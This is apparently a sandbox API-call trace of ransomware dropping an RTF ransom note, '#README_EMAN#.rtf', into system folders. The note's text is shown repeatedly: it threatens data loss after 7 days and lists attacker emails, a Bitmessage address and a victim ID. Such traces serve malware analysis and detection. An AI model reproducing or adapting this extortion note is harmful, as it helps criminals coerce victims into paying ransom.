;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236bcd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÐ_¨¯ã_@\x86¸@*!ªxxªÚ\x965n´Û3s\x9a", lpUsedDefaultChar=0x0) returned 8717 [0269.599] WriteFile (in: hFile=0x284, lpBuffer=0x236bcd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236bcd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.599] CloseHandle (hObject=0x284) returned 1 [0269.599] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\#readme_eman#.rtf")) returned 0xffffffff [0269.599] GetLastError () returned 0x2 [0269.600] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b 